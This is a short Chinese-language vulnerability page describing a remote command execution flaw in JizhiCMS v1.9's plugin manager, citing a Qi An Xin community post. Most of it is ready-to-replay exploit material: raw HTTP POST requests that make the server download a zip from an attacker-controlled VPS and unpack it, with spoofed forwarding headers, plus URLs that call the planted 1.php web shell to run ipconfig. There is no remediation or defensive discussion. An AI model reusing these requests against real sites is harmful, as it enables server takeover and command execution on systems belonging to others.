# 极致CMS 遠程命令執行漏洞/zh-cn
==漏洞信息==
该漏洞首发于奇安信攻防社区,原文在[https://forum.butian.net/share/232 这里]
==影响版本==
v1.9 All
==前提条件==
后台账号权限必须拥有权限插件管理(首页/管理员管理/角色管理/角色修改)
==远程下载Payload==
action=start-download&filepath=3&download_url=http%3A%2F%2F(vps)%2F1.zip


POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.108 Content-Length: 80 Accept: application/json, text/j avas cript, */*; q=0.01 X-Requested-With: X MLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108 Referer: http://192.168.1.108/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close action=start-download&filepath=3&download_url=http%3A%2F%2F192.168.1.108%2F1.zip
==解压Payload==
action=file-upzip&filepath=3&download_url=
POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.108 Content-Length: 42 Accept: application/json, text/j avas cript, */*; q=0.01 X-Requested-With: X MLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108 Referer: http://192.168.1.108/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close action=file-upzip&filepath=3&download_url=
==URLs==
http://127.0.0.1//A/exts//1.php?1=ipconfig http://127.0.0.1//A/exts/1/1.php?1=ipconfig
==参考==
https://forum.butian.net/share/232
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容